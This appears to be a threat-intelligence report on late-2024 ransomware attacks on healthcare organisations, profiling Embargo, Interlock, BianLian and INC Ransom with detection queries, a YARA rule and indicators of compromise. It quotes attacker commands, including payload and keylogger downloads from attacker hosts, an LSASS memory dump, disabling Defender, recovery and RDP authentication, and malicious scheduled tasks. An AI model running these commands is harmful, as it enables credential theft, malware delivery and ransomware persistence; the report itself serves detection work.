This report provides our perspective, based on open-source data, on the methods employed, the objectives of the attacks, and related aspects.
In November 2024, the American Associated Pharmacies (AAP), a cooperative representing over 2,000 independent pharmacies across the United States, became the target of a ransomware attack carried out by the Embargo ransomware group. The group claimed responsibility for the attack, stating on their leak site that they had successfully encrypted AAP’s systems and exfiltrated sensitive company data.
Embargo alleged that AAP paid $1.3 million to decrypt their systems but refused to pay an additional $1.3 million demanded to prevent the publication of the stolen documents. The stolen data reportedly includes confidential company information, internal communications, and financial records.
This incident has raised concerns about the security of critical supply chain and healthcare organizations, as AAP plays a vital role in supporting independent pharmacies throughout the United States. The attack highlights the operational risks ransomware poses to healthcare-associated organizations.
There is no information available regarding the specific methods and tools used in this attack.
The Embargo ransomware group is a newly discovered threat actor first observed in 2024. The group operates under a Ransomware-as-a-Service (RaaS) model, enabling affiliates to conduct attacks using Embargo's tools and infrastructure.
Embargo employs Rust-based ransomware, which provides cross-platform capabilities and makes the malware harder to detect and analyze using traditional security tools. This choice of technology reflects a growing trend among ransomware developers to adopt modern programming languages for greater efficiency and evasion.
The group has demonstrated notable activity in the United States, where the majority of observed attacks have occurred. There is also evidence that Embargo is active in regions such as Canada, England, Australia, Mexico, Brazil, France, Germany, and the United Kingdom.
Embargo uses double extortion tactics, combining file encryption with data exfiltration. On their leak site, Embargo has claimed incidents where victims paid $1.3 million for decryption, only to face additional demands to prevent the publication of stolen data.

While Embargo remains a relatively new actor, its advanced techniques and growing activity have drawn attention within the cybersecurity community.
Embargo ransomware employs a range of tactics to compromise systems, disable recovery options, and encrypt sensitive data. These include:
IntoTheFloodAgainSameOldTrip or LoadUpOnGunsBringYourFriends to prevent multiple executions. [T1480.002]With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI Lookup:
(syncObjectName:"LoadUpOnGunsBringYourFriends" OR syncObjectName:"IntoTheFloodAgainSameOldTrip") AND syncObjectOperation:"Create"
BCDEDIT.EXE to disable automatic Windows recovery using the command:"C:\Windows\System32\cmd.exe" /q /c bcdedit /set {default} recoveryenabled no. [T1490]With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"BCDEDIT /SET {DEFAULT} RECOVERYENABLED NO"
.b58eeb, .3d828a, or .564ba1. [T1486]With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
(filePath:"*.564ba1" or filePath:"*.3d828a" or filePath:"*.b58eeb") And threatName:"embargo"
CreateToolhelp32Snapshot() and iterates through them with Process32First() and Process32Next(). If targeted processes are identified, they are terminated to facilitate encryption. [T1489] HOW_TO_RECOVER_FILES.txt in each encrypted directory.98cc01dcd4c36c47fc13e4853777ca170c734613564a5a764e4d2541a6924d3998cc01dcd4c36c47fc13e4853777ca170c734613564a5a764e4d2541a6924d39ebffc9ced2dba66db9aae02c7ccd2759a36c5167df5cd4adb151b20e7eab173c7bfb789f5825f17a01cccd2fbd62635ce20f6ed7e488fded20549a806371aeb6e6b6503217b0cf50e262a6a843624068f8f6a96441d241695893e6cab3c60a2cA1B98B1FBF69AF79E5A3F27AA6256417488CC117F0A25529B0D0AABCE9D72BA46AAF1C78C5B48C312BA9BF8DD320990119F42F6F68846D8FB14194D6888F27DD2269119CF9524474A6A0B559D0D201A1BA14C43031411240A0836BEDF8C8692B54698E058A85C1399A0E404C8285A723C4214942A45BBFF9612EC1D41B2AA2518363B18381FD89C12315100F7310D6399683BA3EB2F695A2071E0E45891D743Brule Embargo{
meta:
author = "Cyble Research and Intelligence Labs"
description = "Detects Embargo Ransomware"
date = "2024-05-24"
os = "Windows"
strings:
$a1 = "LoadUpOnGunsBringYourFriends" fullword ascii wide
$a2 = "embargo" nocase ascii wide
$a3 = "files01" nocase ascii wide
condition:
all of them
}
The Interlock ransomware group first appeared in public reporting in September 2024. Interlock has targeted organizations across a wide range of sectors. According to disclosures on their data leak site, the group's current focus includes healthcare, technology, and government entities in the United States, as well as manufacturing companies in Europe. This pattern suggests their targeting is largely opportunistic, exploiting vulnerabilities across critical industries.
Reports from open sources, such as Moxfive and Infosecurity Magazine, indicate attacks attributed to Interlock. Notable victims listed on their leak site include Texas Tech University Health Sciences Center, Legacy Treatment Services, and Drug and Alcohol Treatment Service.

The Cisco Talos Incident Response report highlights the discovery of an Interlock ransomware operator. According to the report, the attackers employ the following tactics to deploy and execute Interlock ransomware.
The infection begins when the victim downloads a fake Chrome update installer. This file executes a PowerShell command to download an additional payload: [T1059.001]
powershell.exe -Command Invoke-WebRequest -Uri "hxxps[:]//apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"powershell.exe -Command*Invoke-WebRequest -Uri*apple-online.shop*-OutFile*"
To establish persistence, the malware creates a shortcut file named fahhs.lnk and places it in the Windows Startup folder, ensuring the RAT runs each time the victim logs into the system. [T1547.009]
The RAT collects system information encrypts the collected system data in memory and establishes a secure connection with its command-and-control (C2) server apple-online[.]shop, where the encrypted information is sent.
cmd.exe /c systeminfo "Using this command, the RAT collects information about the victim's machine." [T1082]
The attacker downloads a keylogger from a remote server using the following command:
Invoke-WebRequest -Uri "23[.]95.182.59/31279geuwtoisgdehbiuowaehsgdb/klg" -OutFile "$env:TMP/klg"
The file is decrypted using a predefined password and executed with:
Decrypt-File -inputFile "$env:TMP/klg" -outputFile "$env:TMP/klg.dll" -password "jgSkhg934@kjv#1vkfg2S"
rundll32 "$env:TMP/klg.dll" start [T1218.011]
For reconnaissance, the attacker runs PowerShell commands to gather information about domain computers and user accounts, including pre-Kerberoasting reconnaissance: [T1087.002]
powershell.exe -Command ('AD_Computers: {0}' -f ([adsiSearcher]'(ObjectClass=computer)').FindAll().count)
powershell.exe -Command ([adsisearcher]'(&(objectCategory=user)(servicePrincipalName=*))').FindAll()
To move laterally, the attacker uses Remote Desktop Protocol (RDP) with the command: [T1021.001]
mstsc /v 10.*.*.*
.\conhost.exe -d \10.*.*.*\e$
The ransomware deploys the conhost.exe binary, masquerading as a legitimate file. It stores the binary in a folder with a single-digit name (e.g., 3 or 4) inside the user's temporary application data folder. Upon execution, it encrypts files, appending the .interlock extension, and drops a ransom note named !__README__!.txt into every directory containing encrypted files.[T1486]
To maintain persistence, a scheduled task named TaskSystem is created to run the ransomware daily at 8:00 PM as the SYSTEM user:
schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /c cd \"$Path of the Interlock binary\" && \"$command\"" /st 20:00 /ru system > nul [T1053.005]
The ransomware is also capable of self-deletion after encryption by using an embedded DLL file named tmp41.wasd, which is dropped into the user's temporary folder. [T1070.004]
23[.]95[.]182[.]59195[.]201[.]21[.]34 159[.]223[.]46[.]184hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/chthxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klghxxps[:]//apple-online[.]shop/ChromeSetup[.]exehxxps[:]//rvthereyet[.]com/wp-admin/images/rsggj[.]php a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642 c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642On September 6, 2024, Boston Children’s Health Physicians (BCHP) confirmed that they had detected unusual activity within their systems. By September 10, BCHP took systems offline after identifying unauthorized access to their network.
The BianLian ransomware group later claimed responsibility for the attack, alleging on their leak site that they had exfiltrated sensitive data, including patient records, financial documents, and internal communications. BCHP acknowledged the incident in an official statement, stating that they are working with cybersecurity experts and law enforcement to investigate the breach and restore operations.
BianLian has become increasingly active, shifting to a data extortion model, where they threaten to publish stolen data rather than encrypt systems. The group uses their dark web leak site to pressure victims into complying with their demands.

Further details about the specific tools, methods, or initial access vector used in this attack have not been disclosed.
The BianLian ransomware group was first observed in 2022 and remains an active cyber threat actor in 2024. Initially, the group employed double extortion tactics but shifted in 2023 to a strategy focused solely on data theft and extortion.
BianLian utilizes tools written in the Go programming language, including a custom backdoor for persistent access and further attacks. They also leverage legitimate system utilities (Living off the Land) to navigate networks and evade detection.
The group actively targets various industries, with the highest concentration of victims in legal services and healthcare. BianLian demonstrates high adaptability and continues to pose a significant threat to organizations worldwide.
BianLian ransomware employs a range of tactics to compromise systems, gain persistence, and exfiltrate sensitive data. These include:
dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal * Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
findstr /spin "password" *.* >C:\Users\training\Music\<file>.txt
.bianlian extensions and dropping ransom notes in each affected directory prior to 2024. [T1486]cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full
netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allow
netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"advfirewall firewall add rule*enable=Yes"
schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /c rundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43
1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43SHA-256: 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893
SHA-256: 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
SHA-256: 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500
SHA-256: 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce
SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
SHA-256: af46356eb70f0fbb0799f8a8d5c0f7513d2f6ade4f16d4869f2690029b511d4f
SHA-256: 1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e
SHA-256: 3a2f6e614ff030804aa18cb03fcc3bc357f6226786efb4a734cbe2a3a1984b6f
SHA-256: 46d340eaf6b78207e24b6011422f1a5b4a566e493d72365c6a1cace11c36b28b
SHA-256: eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2
SHA-256: c775e6d87a3bcc5e94cd055fee859bdb6350af033114fe8588d2d4d4f6d2a3ae
SHA-256: c57ca631b069745027d0b4f4d717821ca9bd095e28de2eafe4723eeaf4b062cf
SHA-256: c592194cea0acf3d3e181d2ba3108f0f86d74bcd8e49457981423f5f902d054b
SHA-256: df51b7b031ecc7c7fa899e17cce98b005576a20a199be670569d5e408d21048c
SHA-256: 2ed448721f4e92c7970972f029290ee6269689c840a922982ac2f39c9a6a838f
SHA-256: 264af7e7aa17422eb4299df640c1aa199b4778509697b6b296efa5ae7e957b40
SHA-256: 73d095abf2f31358c8b1fb0d5a0dc9807e88d44282c896b5033c1b270d44111f
SHA-256: 8b65c9437445e9bcb8164d8557ecb9e3585c8bebf37099a3ec1437884efbdd24
SHA-256: 4ca84be5b6ab91694a0f81350cefe8379efcad692872a383671ce4209295edc7
SHA-256: 93fb7f0c2cf10fb5885e03c737ee8508816c1102e9e3d358160b78e91fa1ebdb
SHA-256: afb7f11da27439a2e223e6b651f96eb16a7e35b34918e501886d25439015bf78
SHA-256: 53095e2ad802072e97dbb8a7ccea03a36d1536fce921c80a7a2f160c83366999
SHA-256: 16cbfd155fb44c6fd0f9375376f62a90ac09f8b7689c1afb5b9b4d3e76e28bdf
SHA-256: 60b1394f3afee27701e2008f46d766ef466caa7711c45ddfd443a71efc39a407
SHA-256: ba3c4bc99b67038b42b75a206d7ef04f6d8abaf87a76c373d4dec85e73859ce2
SHA-256: e7e097723d00f58eab785baf30365c1495e99aa6ead6fe1b86109558838d294e
SHA-256: 96e02ea8b1c508f1ee3c1535547f9b89396f557011e61478644ae5876cdaaca5
SHA-256: ac1d42360c45e0e908d07e784ceb15faf8987e4ba1744d56313de6524d2687f7
SHA-256: 1cba58f73221b5bb7930bfeab0106ae5415e70f49a595727022dcf6fda1126e9
SHA-256: 487f0d748a13570a46b20b6687eb7b7fc70a1a55e676fb5ff2599096a1ca888c
SHA-256: f84edc07b23423f2c2cad47c0600133cab3cf2bd6072ad45649d6faf3b70ec30
SHA-256: 93953eef3fe8405d563560dc332135bfe5874ddeb373d714862f72ee62bef518
SHA-256: f3f3c692f728b9c8fd2e1c090b60223ac6c6e88bf186c98ed9842408b78b9f3c
SHA-256: f6669de3baa1bca649afa55a14e30279026e59a033522877b70b74bfc000e276
SHA-256: 228ef7e0a080de70652e3e0d1eab44f92f6280494c6ba98455111053701d3759
SHA-256: 0e4246409cdad59e57c159c7cc4d75319edf7d197bc010174c76fe1257c3a68e
SHA-256: 90f50d723bf38a267f5196e22ba22584a1c84d719b501237f43d10117d972843
SHA-256: 4c008ac5c07d1573a98eb87bffe64e9c9e946de63b40df3f686881cf0698eef7
SHA-256: d3574cc69a5974a32a041d1dc460861fe1cef3c1f063171c5fc890ca0e8403c4
SHA-256: 99fc3e13f3b4d8debf1f2328f56f3810480ee2eed9271ebf413c0015c0a54c23
SHA-256: 4f4a2adc7ecc41f12defe864c78ad6bbf708355affac4115dcd5065b38198109
SHA-256: 188e95d6ed0810c216ab0043ecc2f54f514e624ca31ed1eec58cfc18cc9ac75e
SHA-256: 16b0f643670d1f94663179815bfac493f5f30a61d15c18c8b305b1016eece7ef
SHA-256: c5fa6a7a3b48a2a4bbcbbbb1ca50c730f3545e3fbb03fa17fb814ad7a400a21f
SHA-256: d3fc56b98af9748f7b6dd44e389d343781ff47db9ed3d92ae8fadc837f25f6ed
SHA-256: 23295c518f194dee7815728de15bafe07bf53b52d987c7ad2b2050f833f770f7
SHA-256: 06f10c935fae531e070c55bde15ee3b48b6bb289af237e96eec82124c19d1049
SHA-256: 7ba40902dc495d8da28d0c0788bcfb1449818342df89f005af8ce09f2ee01798
SHA-256: 3106e313f6df73b84acd8d848b467ac42c469ffabbad19e4fdcc963639cfff8c
SHA-256: 56e63edb832fdf08d19ecfe2de1c7c6c6581cedd431215ded0c8e44ac9aed925
SHA-256: 195c11ee41f5a80d8e1b1881245545d6529671b926eb67bd3186e3ffecefe362
SHA-256: ac14946fd31ca586368c774f3a3eed1620bf0f0b4f54544f5d25e87facf18d82
SHA-256: 29a14cb63a1900fe185fad1c1b2f2efb85a058ac3c185948b758f3ce4107e11e
SHA-256: 91ffe0ee445b82bd3360156feeecf8112d27c9333f9796caffcfda986fd7e9b4
SHA-256: 5162fd73cbe8f313d2b0e4180bab4cbe47185f73a3ffc3d1dcccc36bc2865142
SHA-256: 7dabe5d40c13c7c342b7182eaf7c63fbb5e326300316f6f6518b527d57e79ac8
SHA-256: 4e92b73a17e0646876fb9be09c4ee6f015f00273932d2422b69339e22b78b385
SHA-256: 9413ba4a33ea77326b837ba538f92348e1909d5263ca67a86aa327daa8fbba30
SHA-256: bd41ac2686beadc1cb008433960317b648caae37c93d8c0d61ad40fe27b5b67e
SHA-256: bd57af28c94c3b7f156511c48f4b62cd1b4c29a1a693f4dc831e0a928691cc56
SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
ip: 208.123.119[.]123
ip: 13.215.228[.]73
ip: 54.193.91[.]232
ip: 172.96.137[.]159
ip: 204.152.203[.]90
ip: 144.208.127[.]119
ip: 192.161.48[.]43
ip: 146.70.87[.]197
ip: 45.86.230[.]64
ip: 45.56.165[.]17
ip: 23.163.0[.]168
ip: 172.96.137[.]249
ip: 173.254.204[.]78
ip: 185.56.137[.]117
ip: 52.87.206[.]242
ip: 45.66.249[.]118
ip: 96.44.157[.]203
ip: 103.20.235[.]122
ip: 44.212.9[.]14
ip: 149.154.158[.]154
ip: 146.59.102[.]74
ip: 96.44.135[.]76
ip: 85.239.52[.]96
ip: 66.85.156[.]83
ip: 198.252.98[.]186
ip: 3.236.161[.]7
ip: 13.59.168[.]154
ip: 172.245.128[.]35
ip: 216.146.25[.]60
ip: 172.86.122[.]183
ip: 185.99.133[.]112
ip: 149.154.158[.]214
ip: 104.200.72[.]6
ip: 23.163.0[.]228
In November 2024, the Alder Hey Children's NHS Foundation Trust, a major children's hospital in Liverpool, UK, became the target of a ransomware attack. The INC Ransom group claimed responsibility, alleging that they had stolen sensitive data, including patient records, donor reports, and procurement details from 2018 to 2024.
The attack also affected the Liverpool Heart and Chest Hospital NHS Foundation Trust and the Royal Liverpool University Hospital due to shared digital infrastructure. Screenshots of the stolen data, including sensitive patient information and internal documents, were published online and shared across social media, raising concerns about the privacy and security of healthcare systems.

The INC Ransom group frequently targets healthcare organizations, demonstrating a consistent focus on this critical sector. Examples of past victims include NHS Scotland, Behavioral Health Response in the United States, and Continuing Healthcare Solutions in the United States. These attacks often result in significant disruptions, exposing patient records and operational data.
There is no information available regarding the specific methods and tools used in this attack.
The INC Ransom group emerged in mid-2023 as a key player in the ransomware ecosystem, operating under a Ransomware-as-a-Service (RaaS) model. This structure allows various affiliates to carry out attacks using INC Ransom's tools and infrastructure, making their activities more difficult to trace back to the core group.
INC Ransom has primarily targeted organizations across the United States and countries in Europe. Their attacks frequently focus on sectors such as healthcare, education, and industrial enterprises, where sensitive data and critical infrastructure make victims more likely to comply with ransom demands.
INC Ransom employs a range of tactics to compromise systems and extract sensitive data. These include:
document.docx becomes document.docx.inc. [T1486]winupd) [Т1027] The group utilizes specialized tools, including:
fcefe50ed02c8d315272a94f860451bfd3d86fa6ffac215e69dfa26a7a5decedfcefe50ed02c8d315272a94f860451bfd3d86fa6ffac215e69dfa26a7a5deceda0ceb258924ef004fa4efeef4bc0a86012afdb858e855ed14f1bbd31ca2e42f5e2370ef066df692317a5f9d739120e467144cfdcd9a4dd7dd562ebdbf5f0778c1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357af96ecd567d9a05a6adb33f07880eebf1d6a8709512302e363377065ca8f98f5611cfd8e84704194ff9c56780858e9bbb9e82ff1b958149d74c43969d06ea10bd869d6ae8c0568e40086fd817766a503bfe130c805748e7880704985890aca9470cb4e7d35eb3f4585c6168988247e30d99ef24d3ef006d91971e3913ef593c4247873072a0ed065e2f240da3e8b10e7251b9596a82cf0375bfc17f60708b8f743c4e8f6a5dc94966483069b68981b0ad77ff9c547e8ec3d74ed207e3f037ece6c41ab33986921c812c51e7a86bd3fd0691f5bba925fae612f1b717afaa2fe0ef36e3c83e50a19ad1048dab7814f3922631990578aab0790401bc67dbcc90a72e508a644d552f237615d1504aa1628566fe0e752a5bc0c882fa72b3155c322cefd147b202e98ce73802d7501366a036ea8993c4c06cdfc6921899efdd22d159c65e3c44ac77cba228f54304f7f1f9ee4d86099950f230186f11fffaa76c86a5db463075274e328bd47d8092f4901e67f7fff6c5d972b5ffcf821d3c988797e8e3In November 2024, a cyberattack targeting several French healthcare institutions resulted in the compromise and sale of sensitive health data belonging to over 750,000 patients. The attack affected multiple facilities, including Centre Luxembourg, Clinique Alleray-Labrouste, Clinique Jean d'Arc, Clinique Saint-Isabelle, and Hôpital Privé de Thiais, all of which rely on MediBoard, a software platform widely used for managing patient medical records and administrative workflows in healthcare institutions. It is an integral part of the digital infrastructure in many hospitals across France.
The individual behind the attack, known by the alias "nears" (previously "near2tlg"), claimed responsibility for the breach. The attacker alleged having access to patient records of over 1,500,000 individuals, although the confirmed data leak involved 750,000 records. Unauthorized access to MediBoard systems was also advertised for sale, increasing the threat of further breaches.
The compromised database was listed for sale on BreachForums, a dark web platform known for trading stolen information. The records reportedly include full names, Social Security numbers, health conditions, appointment histories, and contact details of patients.

There is no information available regarding the specific methods and tools used in this attack.
In late November 2024, the Wirral University Teaching Hospital NHS Trust in the UK was hit by a cyberattack that disrupted operations at several major facilities, including Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children's Hospital.
The attack disabled critical systems, forcing staff to use manual records. Many appointments were canceled, and patients were redirected to other hospitals as the Trust declared a major incident.
By December 4, the Trust announced that key clinical systems were being restored, but some services were still unavailable. Patients were advised to visit only in urgent cases.
No cybercriminal group has claimed responsibility for the attack, and there is no information about how the attack was carried out or how initial access was gained.
There is no information available regarding the specific methods and tools used in this attack.